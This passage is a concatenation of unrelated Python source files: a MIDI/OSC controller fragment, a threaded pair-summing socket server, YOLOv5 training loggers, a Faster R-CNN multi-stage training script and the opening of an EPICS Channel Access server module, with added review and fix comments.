    self.daw_osc_thread.start()
    self.ctl_osc_thread.start()
    self.send_osc_to_ctl_thread.start()
    self.send_midi_to_ctl_thread.start()
    # Ports are optional; None means that direction is not used.
    if self.midi_in_port is not None:
        self.midi_in.open_port(self.midi_in_port)
    if self.midi_out_port is not None:
        self.midi_out.open_port(self.midi_out_port)
    self.init_osc_device()
    self.init_midi_device()
    self.refresh_fx()
def toggle_learn(self):
    """Toggle MIDI-learn mode, persisting mappings when switching it off."""
    self.learn_active = not self.learn_active
    if self.learn_active:
        logger.info('Learn activated')
    else:
        # Leaving learn mode: persist whatever was learned this session.
        self.save_fx_maps()
        logger.info('Learn disactivated')
    # Discard any half-completed learn pair either way.
    self.learn_source = None
    self.learn_target = None
    # Fix: the address was a pointless f-string (no placeholders, F541).
    self.send_osc_to_ctl(
        "/fx/learn", 1 if self.learn_active else 0)
    self.refresh_fx()
|
server.py | import socket
import threading
# Shared state for the pair-summing server; guarded by the primitives below.
HOST = "127.0.0.1"
PORT = 5052
ENCODING = "ascii"
clients = []
numbers = []
# This lock is used to access 'numbers' list.
numbers_lock = threading.Lock()
# This semaphore is used for clients. So after a client put one number in 'numbers', it waits until the other number is
# also added to the array and their sum calculated. When the sum is calculated we will release this semaphore two times
# to let two client handlers work again.
client_sema = threading.Semaphore(0)
# This semaphore is used in handle_sum. It will cause it to wait until one of clients check that there are two numbers
# in 'numbers'. When there are two numbers in list, they will wake the thread that is handling handle_sum.
result_sema = threading.Semaphore(0)
def handle_client(conn: socket.socket, addr):
    """Serve one client: read integers, pair each with another client's
    number, and wait until the pair's sum has been broadcast.

    Protocol invariant: a handler may only block on client_sema after it
    contributed a number to 'numbers'.
    """
    print(f"[CONNECTED] {addr}")
    while True:
        data = conn.recv(1024).decode(ENCODING)
        if not data:
            break
        print(f"[RECEIVED] {data}")
        try:
            data = int(data)
        except ValueError:
            # Fix: a non-integer payload previously fell through to the
            # semaphore wait below without contributing a number, breaking
            # the two-number pairing protocol (possible deadlock). Also
            # narrowed the bare 'except'.
            conn.send("Invalid Argument".encode(ENCODING))
            continue
        # Fix: append and the len==2 check must happen under ONE lock
        # acquisition. With two separate acquisitions both appenders could
        # observe len == 2 and release result_sema twice, making handle_sum
        # run a second time on an empty list (IndexError).
        with numbers_lock:
            numbers.append(data)
            if len(numbers) == 2:
                # Wake the summing thread exactly once per pair.
                result_sema.release()
        # Wait until two numbers are in 'numbers' and their sum has been
        # calculated and broadcast; handle_sum releases this twice per pair.
        client_sema.acquire(blocking=True)
    # Guard the removal: be tolerant if the connection was already dropped.
    if conn in clients:
        clients.remove(conn)
    conn.close()
def broadcast(msg: str):
    """Send *msg* to every connected client."""
    payload = msg.encode(ENCODING)
    for client in clients:
        client.send(payload)
def handle_sum():
    """Consumer thread: sum each pair of submitted numbers and broadcast it."""
    while True:
        # Wait until there are two numbers in 'numbers'. One of the client handlers will wake this thread.
        result_sema.acquire()
        # NOTE(review): 'numbers' is read and cleared without numbers_lock
        # here; this relies on both contributing clients being blocked on
        # client_sema until the releases below — confirm no third client can
        # append concurrently.
        result = numbers[0] + numbers[1]
        numbers.clear()
        broadcast(str(result))
        # Unblock exactly the two handlers that contributed this pair.
        client_sema.release()
        client_sema.release()
if __name__ == '__main__':
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        # Start the summing consumer before accepting any clients.
        sum_thread = threading.Thread(target=handle_sum)
        sum_thread.start()
        s.bind((HOST, PORT))
        s.listen()
        # Accept loop: one (non-daemon) handler thread per connection.
        while True:
            conn, addr = s.accept()
            clients.append(conn)
            t = threading.Thread(target=handle_client, args=(conn, addr))
            t.start()
|
__init__.py | # YOLOv5 experiment logging utils
import warnings
from threading import Thread
import torch
from torch.utils.tensorboard import SummaryWriter
from yolov5_master.utils.general import colorstr, emojis
from yolov5_master.utils.loggers.wandb.wandb_utils import WandbLogger
from yolov5_master.utils.plots import plot_images, plot_results
from yolov5_master.utils.torch_utils import de_parallel
LOGGERS = ('csv', 'tb', 'wandb')  # text-file, TensorBoard, Weights & Biases
# wandb is optional: fall back to None when the package is absent or when a
# local directory named 'wandb' shadows the real package.
try:
    import wandb
    assert hasattr(wandb, '__version__')  # verify package import not local dir
except (ImportError, AssertionError):
    wandb = None
class Loggers():
    # YOLOv5 Loggers class: fans training callbacks out to the enabled
    # backends (csv file, TensorBoard, Weights & Biases).
    def __init__(self, save_dir=None, weights=None, opt=None, hyp=None, logger=None, include=LOGGERS):
        """Initialise the requested logging backends.

        save_dir: run directory (a Path; .parent/.glob are used on it).
        include: subset of LOGGERS to activate; csv is always on.
        """
        self.save_dir = save_dir
        self.weights = weights
        self.opt = opt
        self.hyp = hyp
        self.logger = logger  # for printing results to console
        self.include = include
        self.keys = ['train/box_loss', 'train/obj_loss', 'train/cls_loss',  # train loss
                     'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95',  # metrics
                     'val/box_loss', 'val/obj_loss', 'val/cls_loss',  # val loss
                     'x/lr0', 'x/lr1', 'x/lr2']  # params
        for k in LOGGERS:
            setattr(self, k, None)  # init empty logger dictionary
        self.csv = True  # always log to csv
        # Message
        if not wandb:
            prefix = colorstr('Weights & Biases: ')
            s = f"{prefix}run 'pip install wandb' to automatically track and visualize YOLOv5 🚀 runs (RECOMMENDED)"
            print(emojis(s))
        # TensorBoard
        s = self.save_dir
        if 'tb' in self.include and not self.opt.evolve:
            prefix = colorstr('TensorBoard: ')
            self.logger.info(f"{prefix}Start with 'tensorboard --logdir {s.parent}', view at http://localhost:6006/")
            self.tb = SummaryWriter(str(s))
        # W&B
        if wandb and 'wandb' in self.include:
            wandb_artifact_resume = isinstance(self.opt.resume, str) and self.opt.resume.startswith('wandb-artifact://')
            run_id = torch.load(self.weights).get('wandb_id') if self.opt.resume and not wandb_artifact_resume else None
            self.opt.hyp = self.hyp  # add hyperparameters
            self.wandb = WandbLogger(self.opt, run_id)
        else:
            self.wandb = None

    def on_pretrain_routine_end(self):
        # Callback runs on pre-train routine end
        paths = self.save_dir.glob('*labels*.jpg')  # training labels
        if self.wandb:
            self.wandb.log({"Labels": [wandb.Image(str(x), caption=x.name) for x in paths]})

    def on_train_batch_end(self, ni, model, imgs, targets, paths, plots, sync_bn):
        # Callback runs on train batch end
        # NOTE(review): self.tb may be None when 'tb' is excluded or
        # opt.evolve is set; add_graph below would then fail — confirm
        # callers only pass plots=True with TensorBoard enabled.
        if plots:
            if ni == 0:
                if not sync_bn:  # tb.add_graph() --sync known issue https://github.com/ultralytics/yolov5/issues/3754
                    with warnings.catch_warnings():
                        warnings.simplefilter('ignore')  # suppress jit trace warning
                        self.tb.add_graph(torch.jit.trace(de_parallel(model), imgs[0:1], strict=False), [])
            if ni < 3:
                f = self.save_dir / f'train_batch{ni}.jpg'  # filename
                Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
            if self.wandb and ni == 10:
                files = sorted(self.save_dir.glob('train*.jpg'))
                self.wandb.log({'Mosaics': [wandb.Image(str(f), caption=f.name) for f in files if f.exists()]})

    def on_train_epoch_end(self, epoch):
        # Callback runs on train epoch end
        if self.wandb:
            self.wandb.current_epoch = epoch + 1

    def on_val_image_end(self, pred, predn, path, names, im):
        # Callback runs on val image end
        if self.wandb:
            self.wandb.val_one_image(pred, predn, path, names, im)

    def on_val_end(self):
        # Callback runs on val end
        if self.wandb:
            files = sorted(self.save_dir.glob('val*.jpg'))
            self.wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in files]})

    def on_fit_epoch_end(self, vals, epoch, best_fitness, fi):
        # Callback runs at the end of each fit (train+val) epoch
        x = {k: v for k, v in zip(self.keys, vals)}  # dict
        if self.csv:
            file = self.save_dir / 'results.csv'
            n = len(x) + 1  # number of cols
            s = '' if file.exists() else (('%20s,' * n % tuple(['epoch'] + self.keys)).rstrip(',') + '\n')  # add header
            with open(file, 'a') as f:
                f.write(s + ('%20.5g,' * n % tuple([epoch] + vals)).rstrip(',') + '\n')
        if self.tb:
            for k, v in x.items():
                self.tb.add_scalar(k, v, epoch)
        if self.wandb:
            self.wandb.log(x)
            self.wandb.end_epoch(best_result=best_fitness == fi)

    def on_model_save(self, last, epoch, final_epoch, best_fitness, fi):
        # Callback runs on model save event
        if self.wandb:
            if ((epoch + 1) % self.opt.save_period == 0 and not final_epoch) and self.opt.save_period != -1:
                self.wandb.log_model(last.parent, self.opt, epoch, fi, best_model=best_fitness == fi)

    def on_train_end(self, last, best, plots, epoch):
        # Callback runs on training end
        if plots:
            plot_results(file=self.save_dir / 'results.csv')  # save results.png
        files = ['results.png', 'confusion_matrix.png', *[f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R')]]
        files = [(self.save_dir / f) for f in files if (self.save_dir / f).exists()]  # filter
        if self.tb:
            import cv2
            for f in files:
                self.tb.add_image(f.stem, cv2.imread(str(f))[..., ::-1], epoch, dataformats='HWC')
        if self.wandb:
            self.wandb.log({"Results": [wandb.Image(str(f), caption=f.name) for f in files]})
            # Calling wandb.log. TODO: Refactor this into WandbLogger.log_model
            if not self.opt.evolve:
                wandb.log_artifact(str(best if best.exists() else last), type='model',
                                   name='run_' + self.wandb.wandb_run.id + '_model',
                                   aliases=['latest', 'best', 'stripped'])
                self.wandb.finish_run()
            else:
                # Evolve mode: close this run and start a fresh logger.
                self.wandb.finish_run()
                self.wandb = WandbLogger(self.opt)
|
train_msu.py | #!/usr/bin/env python
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""Train a Faster R-CNN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("Faster R-CNN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals
import argparse
import pprint
import numpy as np
import sys, os
import multiprocessing as mp
import cPickle
import shutil
def parse_args():
    """
    Parse input arguments
    """
    parser = argparse.ArgumentParser(description='Train a Faster R-CNN network')
    parser.add_argument('--gpu', dest='gpu_id', type=int, default=0,
                        help='GPU device id to use [0]')
    parser.add_argument('--net_name', dest='net_name', type=str, default=None,
                        help='network name (e.g., "ZF")')
    parser.add_argument('--weights', dest='pretrained_model', type=str, default=None,
                        help='initialize with pretrained model weights')
    parser.add_argument('--cfg', dest='cfg_file', type=str, default=None,
                        help='optional config file')
    parser.add_argument('--imdb', dest='imdb_name', type=str, default='voc_2007_trainval',
                        help='dataset to train on')
    parser.add_argument('--set', dest='set_cfgs', default=None,
                        nargs=argparse.REMAINDER, help='set config keys')
    # Invoked with no arguments at all: show usage and bail out.
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)
    return parser.parse_args()
def get_roidb(imdb_name, rpn_file=None):
    """Load an imdb by name and build its training roidb.

    Returns (roidb, imdb). When rpn_file is given it is attached to the
    imdb config so the 'rpn' proposal method can find it. (Python 2 code.)
    """
    imdb = get_imdb(imdb_name)
    print 'Loaded dataset `{:s}` for training'.format(imdb.name)
    imdb.set_proposal_method(cfg.TRAIN.PROPOSAL_METHOD)
    print 'Set proposal method: {:s}'.format(cfg.TRAIN.PROPOSAL_METHOD)
    if rpn_file is not None:
        imdb.config['rpn_file'] = rpn_file
    roidb = get_training_roidb(imdb)
    return roidb, imdb
def get_solvers(net_name):
    """Return (solver paths, per-stage max iters, RPN test prototxt) for
    the 4-stage Faster R-CNN alternating-optimization schedule."""
    # Faster R-CNN Alternating Optimization
    variant = 'faster_rcnn_alt_opt'
    # Solver for each training stage
    stage_files = ['stage1_rpn_solver60k80k.pt',
                   'stage1_fast_rcnn_solver30k40k.pt',
                   'stage2_rpn_solver60k80k.pt',
                   'stage2_fast_rcnn_solver30k40k.pt']
    solvers = [os.path.join(cfg.MODELS_DIR, net_name, variant, fname)
               for fname in stage_files]
    # Iterations for each training stage
    max_iters = [80000, 40000, 80000, 40000]
    # max_iters = [100, 100, 100, 100]
    # Test prototxt for the RPN
    rpn_test_prototxt = os.path.join(
        cfg.MODELS_DIR, net_name, variant, 'rpn_test.pt')
    return solvers, max_iters, rpn_test_prototxt
# ------------------------------------------------------------------------------
# Pycaffe doesn't reliably free GPU memory when instantiated nets are discarded
# (e.g. "del net" in Python code). To work around this issue, each training
# stage is executed in a separate process using multiprocessing.Process.
# ------------------------------------------------------------------------------
def _init_caffe(cfg):
    """Initialize pycaffe in a training process.

    Seeds numpy and caffe from cfg.RNG_SEED for reproducibility and puts
    caffe in GPU mode on cfg.GPU_ID. Imported lazily because pycaffe must
    be initialised inside the worker process, not the parent.
    """
    import caffe
    # fix the random seeds (numpy and caffe) for reproducibility
    np.random.seed(cfg.RNG_SEED)
    caffe.set_random_seed(cfg.RNG_SEED)
    # set up caffe
    caffe.set_mode_gpu()
    caffe.set_device(cfg.GPU_ID)
def train_rpn(queue=None, imdb_name=None, init_model=None, solver=None,
              max_iters=None, cfg=None):
    """Train a Region Proposal Network in a separate training process.

    Runs as a multiprocessing child so pycaffe's GPU memory is released
    when the process exits. The final snapshot path is reported via
    queue.put({'model_path': ...}). (Python 2 code.)
    """
    # Not using any proposals, just ground-truth boxes
    cfg.TRAIN.HAS_RPN = True
    cfg.TRAIN.BBOX_REG = False  # applies only to Fast R-CNN bbox regression
    cfg.TRAIN.PROPOSAL_METHOD = 'gt'
    cfg.TRAIN.IMS_PER_BATCH = 1
    print 'Init model: {}'.format(init_model)
    print('Using config:')
    pprint.pprint(cfg)
    import caffe
    _init_caffe(cfg)
    roidb, imdb = get_roidb(imdb_name)
    print 'roidb len: {}'.format(len(roidb))
    output_dir = get_output_dir(imdb)
    print 'Output will be saved to `{:s}`'.format(output_dir)
    model_paths = train_net(solver, roidb, output_dir,
                            pretrained_model=init_model,
                            max_iters=max_iters)
    # Cleanup all but the final model
    for i in model_paths[:-1]:
        os.remove(i)
    rpn_model_path = model_paths[-1]
    # Send final model path through the multiprocessing queue
    queue.put({'model_path': rpn_model_path})
def rpn_generate(queue=None, imdb_name=None, rpn_model_path=None, cfg=None,
                 rpn_test_prototxt=None):
    """Use a trained RPN to generate proposals.

    Runs as a multiprocessing child; the pickled proposal file path is
    reported via queue.put({'proposal_path': ...}). (Python 2 code.)
    """
    cfg.TEST.RPN_PRE_NMS_TOP_N = -1     # no pre NMS filtering
    cfg.TEST.RPN_POST_NMS_TOP_N = 2000  # limit top boxes after NMS
    print 'RPN model: {}'.format(rpn_model_path)
    print('Using config:')
    pprint.pprint(cfg)
    import caffe
    _init_caffe(cfg)
    # NOTE: the matlab implementation computes proposals on flipped images, too.
    # We compute them on the image once and then flip the already computed
    # proposals. This might cause a minor loss in mAP (less proposal jittering).
    imdb = get_imdb(imdb_name)
    print 'Loaded dataset `{:s}` for proposal generation'.format(imdb.name)
    # Load RPN and configure output directory
    rpn_net = caffe.Net(rpn_test_prototxt, rpn_model_path, caffe.TEST)
    output_dir = get_output_dir(imdb)
    print 'Output will be saved to `{:s}`'.format(output_dir)
    # Generate proposals on the imdb
    rpn_proposals = imdb_proposals(rpn_net, imdb)
    # Write proposals to disk and send the proposal file path through the
    # multiprocessing queue
    rpn_net_name = os.path.splitext(os.path.basename(rpn_model_path))[0]
    rpn_proposals_path = os.path.join(
        output_dir, rpn_net_name + '_proposals.pkl')
    with open(rpn_proposals_path, 'wb') as f:
        cPickle.dump(rpn_proposals, f, cPickle.HIGHEST_PROTOCOL)
    print 'Wrote RPN proposals to {}'.format(rpn_proposals_path)
    queue.put({'proposal_path': rpn_proposals_path})
def train_fast_rcnn(queue=None, imdb_name=None, init_model=None, solver=None,
                    max_iters=None, cfg=None, rpn_file=None):
    """Train a Fast R-CNN using proposals generated by an RPN.

    Runs as a multiprocessing child; the final snapshot path is reported
    via queue.put({'model_path': ...}). (Python 2 code.)
    """
    cfg.TRAIN.HAS_RPN = False           # not generating proposals on-the-fly
    cfg.TRAIN.PROPOSAL_METHOD = 'rpn'   # use pre-computed RPN proposals instead
    cfg.TRAIN.IMS_PER_BATCH = 2
    print 'Init model: {}'.format(init_model)
    print 'RPN proposals: {}'.format(rpn_file)
    print('Using config:')
    pprint.pprint(cfg)
    import caffe
    _init_caffe(cfg)
    roidb, imdb = get_roidb(imdb_name, rpn_file=rpn_file)
    output_dir = get_output_dir(imdb)
    print 'Output will be saved to `{:s}`'.format(output_dir)
    # Train Fast R-CNN
    model_paths = train_net(solver, roidb, output_dir,
                            pretrained_model=init_model,
                            max_iters=max_iters)
    # Cleanup all but the final model
    for i in model_paths[:-1]:
        os.remove(i)
    fast_rcnn_model_path = model_paths[-1]
    # Send Fast R-CNN model path over the multiprocessing queue
    queue.put({'model_path': fast_rcnn_model_path})
if __name__ == '__main__':
    args = parse_args()
    print('Called with args:')
    print(args)
    if args.cfg_file is not None:
        cfg_from_file(args.cfg_file)
    if args.set_cfgs is not None:
        cfg_from_list(args.set_cfgs)
    cfg.GPU_ID = args.gpu_id
    # --------------------------------------------------------------------------
    # Pycaffe doesn't reliably free GPU memory when instantiated nets are
    # discarded (e.g. "del net" in Python code). To work around this issue, each
    # training stage is executed in a separate process using
    # multiprocessing.Process.
    # --------------------------------------------------------------------------
    # queue for communicated results between processes
    mp_queue = mp.Queue()
    # solves, iters, etc. for each training stage
    solvers, max_iters, rpn_test_prototxt = get_solvers(args.net_name)
    # Stage 1a: train an RPN from the ImageNet-initialised weights.
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    print 'Stage 1 RPN, init from ImageNet model'
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        init_model=args.pretrained_model,
        solver=solvers[0],
        max_iters=max_iters[0],
        cfg=cfg)
    p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
    p.start()
    rpn_stage1_out = mp_queue.get()
    p.join()
    # Stage 1b: dump proposals from the stage-1 RPN.
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    print 'Stage 1 RPN, generate proposals'
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        rpn_model_path=str(rpn_stage1_out['model_path']),
        cfg=cfg,
        rpn_test_prototxt=rpn_test_prototxt)
    p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
    p.start()
    rpn_stage1_out['proposal_path'] = mp_queue.get()['proposal_path']
    p.join()
    # Stage 1c: train Fast R-CNN on the stage-1 proposals.
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    print 'Stage 1 Fast R-CNN using RPN proposals, init from ImageNet model'
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    cfg.TRAIN.SNAPSHOT_INFIX = 'stage1'
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        init_model=args.pretrained_model,
        solver=solvers[1],
        max_iters=max_iters[1],
        cfg=cfg,
        rpn_file=rpn_stage1_out['proposal_path'])
    p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
    p.start()
    fast_rcnn_stage1_out = mp_queue.get()
    p.join()
    # Stage 2a: re-train the RPN starting from the stage-1 Fast R-CNN weights.
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    print 'Stage 2 RPN, init from stage 1 Fast R-CNN model'
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        init_model=str(fast_rcnn_stage1_out['model_path']),
        solver=solvers[2],
        max_iters=max_iters[2],
        cfg=cfg)
    p = mp.Process(target=train_rpn, kwargs=mp_kwargs)
    p.start()
    rpn_stage2_out = mp_queue.get()
    p.join()
    # Stage 2b: dump proposals from the stage-2 RPN.
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    print 'Stage 2 RPN, generate proposals'
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        rpn_model_path=str(rpn_stage2_out['model_path']),
        cfg=cfg,
        rpn_test_prototxt=rpn_test_prototxt)
    p = mp.Process(target=rpn_generate, kwargs=mp_kwargs)
    p.start()
    rpn_stage2_out['proposal_path'] = mp_queue.get()['proposal_path']
    p.join()
    # Stage 2c: final Fast R-CNN training pass on the stage-2 proposals.
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    print 'Stage 2 Fast R-CNN, init from stage 2 RPN R-CNN model'
    print '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'
    cfg.TRAIN.SNAPSHOT_INFIX = 'stage2'
    mp_kwargs = dict(
        queue=mp_queue,
        imdb_name=args.imdb_name,
        init_model=str(rpn_stage2_out['model_path']),
        solver=solvers[3],
        max_iters=max_iters[3],
        cfg=cfg,
        rpn_file=rpn_stage2_out['proposal_path'])
    p = mp.Process(target=train_fast_rcnn, kwargs=mp_kwargs)
    p.start()
    fast_rcnn_stage2_out = mp_queue.get()
    p.join()
    # Create final model (just a copy of the last stage)
    final_path = os.path.join(
        os.path.dirname(fast_rcnn_stage2_out['model_path']),
        args.net_name + '_faster_rcnn_final.caffemodel')
    print 'cp {} -> {}'.format(
        fast_rcnn_stage2_out['model_path'], final_path)
    shutil.copy(fast_rcnn_stage2_out['model_path'], final_path)
    print 'Final model: {}'.format(final_path)
|
CAServer.py | """
Support mudule for EPICS Input/Output Controllers (IOCs)
Implements the server side of the Channel Access (CA) protocol, version 4.11.
Author: Friedrich Schotte
Date created: 2009-10-31
Date last modified: 2019-06-02
based on: 'Channel Access Protocol Specification', version 4.11
http://epics.cosylab.com/cosyjava/JCA-Common/Documentation/CAproto.html
Object-Oriented Interface 1
PV class object: recommended for application that export a single
process variable.
def getT(): return float(serial_port.query("SET:TEMP?"))
def setT(T): serial_port.write("SET:TEMP %s" % T)
pv = PV("14IDB:TemperatureController.T",get=getT,set=setT)
Object-Oriented Interface 2
Use "register" object to export properties of a Python class object as
EPICS PVs.
class Temperature(object):
def get_value(self): return float(serial_port.query("SET:TEMP?"))
def set_value(self,value): serial_port.write("SET:TEMP %s" % value)
value = property(get_value,set_value)
T = Temperature()
register_object(T,prefix="14IDB:TemperatureController.")
Procedural Interface
casput ("14IDB:MyInstrument.VAL",1.234)
Creates a process variable named "14IDB:MyInstrument.VAL"
Subsequent calls to with difference value cause update events to besent to
connected clients.
casget ("14IDB:MyInstrument.VAL")
Reads back the current value of the "14IDB:MyInstrument.VAL", which may have
been modified be a client since the last casput.
casmonitor("14IDB:MyInstrument.VAL",callback=procedure)
The function "procedure" is called when a client modifies a the process
variable with three arguments:
- the name of the process variable
- the new value
- the new value as string
"""
from logging import debug,info,warn,error
__version__ = "1.5.1" # EPICS 3.16 compatibility: Read request have data_count=0
DEBUG = False # Generate debug messages?
# Objects exported via register_object, stored as (object, name_prefix) pairs.
registered_objects = []
def register_object(object,name=""):
    """Export all properties of *object* as PVs under the prefix *name*."""
    global registered_objects
    start_server()
    # Replace any previous registration under the same name prefix.
    unregister_object(name=name)
    registered_objects += [(object,name)]
casregister = CAServer_register = register_object # alias names
def unregister_object(object=None,name=None):
    """Undo 'register_object'.

    May be called with the object, its name prefix, or both; matching
    registrations are removed and the PVs exported under that prefix
    are deleted.
    """
    global registered_objects
    if name is None:
        # Look up the prefix the object was registered under.
        for (o,n) in registered_objects:
            if o is object: name = n
    if name is not None:
        # Fix: snapshot the keys with list(); delete_PV mutates PVs while we
        # iterate, which raises RuntimeError on Python 3 and is fragile on 2.
        for PV_name in list(PVs.keys()):
            if PV_name.startswith(name): delete_PV(PV_name)
    if object is not None:
        registered_objects = [(o,n) for (o,n) in registered_objects if not o is object]
    if name is not None:
        registered_objects = [(o,n) for (o,n) in registered_objects if not n == name]
# PV_name -> (object, property_name) bindings created by register_property.
registered_properties = {}
def register_property(object,property_name,PV_name):
    """Export a single property of *object* as the PV *PV_name*."""
    global registered_properties
    start_server()
    # Drop any previous binding of this PV name before re-binding it.
    unregister_property(PV_name=PV_name)
    registered_properties[PV_name] = (object,property_name)
def unregister_property(object=None,property_name=None,PV_name=None):
    """Undo 'register_property'.

    Selects bindings by (object, property_name, PV_name), by PV_name
    alone, or by (object, property_name) alone.
    (Docstring previously said 'register_object' — copy-paste error.)
    """
    global registered_properties
    if object is not None and property_name is not None and PV_name is not None:
        if PV_name in registered_properties:
            if registered_properties[PV_name] == (object,property_name):
                del registered_properties[PV_name]
    elif PV_name is not None:
        if PV_name in registered_properties: del registered_properties[PV_name]
    elif object is not None and property_name is not None:
        # Fix: snapshot the keys with list(); deleting entries while
        # iterating a live keys view raises RuntimeError on Python 3.
        for key in list(registered_properties.keys()):
            if registered_properties[key] == (object,property_name):
                del registered_properties[key]
def casdel(name):
    """Undo 'casput': delete every PV whose name starts with *name*."""
    # Fix: snapshot the keys with list(); delete_PV mutates PVs while we
    # iterate, which raises RuntimeError on Python 3.
    for PV_name in list(PVs.keys()):
        if PV_name.startswith(name): delete_PV(PV_name)
class PV(object):
    """Process Variable.
    Override the 'set_value' and 'get_value' methods in subclasses"""
    # All PV objects ever created; see NOTE in __init__.
    instances = []
    def __init__(self,name):
        """name: common prefix for all process variables, e.g.
        '14IDB:MyInstrument.'"""
        self.__name__ = name
        # NOTE(review): 'self.instances += [...]' mutates the shared
        # class-level list in place AND creates an instance attribute
        # aliasing it — confirm this double effect is intended.
        self.instances += [self]
        start_server()
    def get_value(self): return getattr(self,"__value__",None)
    def set_value(self,value): self.__value__ = value
    value = property(get_value,set_value)
    def get_connected(self): return PV_connected(self.__name__)
    connected = property(get_connected)
    def __setattr__(self,attr,value):
        """Called when x.attr = value is executed."""
        ##if DEBUG: debug("PV.__setattr__(%r,%r)" % (attr,value))
        object.__setattr__(self,attr,value)
        # Writing 'value' pushes an update event to subscribed CA clients.
        if attr == "value":
            notify_subscribers_if_changed(self.__name__,value)
    def __getattr__(self,attr):
        """Called when x.attr is evaluated."""
        ##if DEBUG: debug("PV.__getattr__(%r)" % attr)
        # NOTE(review): 'object' defines no __getattr__, so this call raises
        # AttributeError for any missing attribute and the lines below look
        # unreachable — was object.__getattribute__ intended? TODO confirm.
        value = object.__getattr__(self,attr)
        if attr == "value":
            notify_subscribers_if_changed(self.__name__,value)
        return value
def casput(PV_name,value,update=True):
    """Create a new process variable with the given name,
    or update an existing one.
    update: send an update to the clients even if the value has not changed.
    """
    if DEBUG: debug("casput(%r,%r)" % (PV_name,value))
    start_server()
    # Create the PV record on first use.
    if not PV_name in PVs.keys(): PVs[PV_name] = PV_info()
    PV = PVs[PV_name]
    # Only propagate when the value changed, unless 'update' forces it.
    if PV_value(PV_name) != value or update: PV_set_value(PV_name,value)
CAServer_put = casput
def casget(PV_name):
    """Current value of a process variable.
    May differ from the last casput value if a client wrote to the PV."""
    start_server()
    return PV_value(PV_name)
CAServer_get = casget
def casmonitor(PV_name,writer=None,callback=None):
    """Call a function every time a PV changes value.
    writer: function that will be passed a formatted string:
    "<PV_name> <date> <time> <value>"
    E.g. "14IDB:SAMPLEZ.RBV 2013-11-02 18:25:13.555540 4.3290"
    f=file("PV.log","w"); camonitor("14IDB:SAMPLEZ.RBV",f.write)
    callback: function that will be passed three arguments:
    the PV name, its new value, and its new value as string.
    E.g. def callback(pvname,value,char_value): print pvname,value,char_value
    """
    start_server()
    # Create the PV record on first use so monitors can pre-date casput.
    if not PV_name in PVs.keys(): PVs[PV_name] = PV_info()
    PV = PVs[PV_name]
    if callback is None and writer is None:
        # By default, if no arguments are given, just print update messages.
        import sys
        writer = sys.stdout.write
    # Register each handler at most once.
    if callback is not None:
        if not callback in PV.callbacks: PV.callbacks += [callback]
    if writer is not None:
        if not writer in PV.writers: PV.writers += [writer]
CAServer_monitor = casmonitor
class PV_info:
    """Per-PV server-side state record."""
    def __init__(self):
        # Current value in Python format.
        self.value = None
        # subscriber_info objects, indexed by (address, port).
        self.subscribers = {}
        # Server-assigned session identity number.
        self.channel_SID = None
        # Timestamp of the value.
        self.last_updated = 0
        # Callback functions registered via "casmonitor".
        self.callbacks = []
        # Writer functions registered via "casmonitor".
        self.writers = []
PVs = {} # Active process variables, indexed by name
class subscriber_info:
    """Per-connection state for one client subscription to a PV."""
    def __init__(self,subscription_ID=None,data_type=None,data_count=None):
        """subscription_ID: client-assigned number for EVENT_ADD updates"""
        self.subscription_ID = subscription_ID
        # Requested CA data type (DOUBLE, LONG, STRING, ...).
        self.data_type = data_type
        # 1 if a scalar, >1 if an array.
        self.data_count = data_count
# Short-lived value cache for PVs, keyed by PV name.
cache = {}
# Seconds a cached value stays fresh.
cache_timeout = 1.0
class cache_entry():
